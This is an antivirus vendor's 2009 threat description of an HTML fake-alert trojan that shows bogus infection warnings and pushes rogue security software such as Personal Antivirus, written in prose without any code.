| Alias/es | Adware.Fakealert-560, HTML/FakeAler.ibp.6, HTML/FakeAle.avs.77 |
| Release Date | Aug 31, 2009 |
| Detection Availability | Current Antivirus Definition Database Version: 11.578 | | Description | Visible Symptoms
- Popup messages are displayed containing fake information on found threats in the user's computer.
Detailed Analysis
This detection is for HTML files that display messages that intend to deceive the user into believing that his system is infected with different types of malware. The messages also intend to trick the user into downloading rogue security programs such as Personal Antivirus and Total Security.
Technical Details
When the HTML file is first loaded in the user's browser, it displays a message box containing a message that warns the user that the system needs to be scanned for threats. Below is an example of this message:
Figure 1: Example of the fake warning message.
|
The behavior of this trojan is the same whether the user clicks the OK or the Cancel button. After the user clicks any of the two buttons, the browser displays a page containing fake information on various numbers of threats found in the computer. These numbers are hard-coded and do not correspond to actual threats.
When the user closes the browser window, it displays another message box containing a message that a security program is required to repair the computer. As of this writing, Personal Antivirus and Total Security are the names of the rogue security programs that are mentioned. Below is an example of this message:
Figure 2: Example of the message requiring the user to install the rogue security program.
|
The user is not given any other option other than the OK button. After clicking this button, the trojan downloads the rogue security program.
|
Description Last Updated Date: Sep 10, 2009
Reference: ID - 1014569
|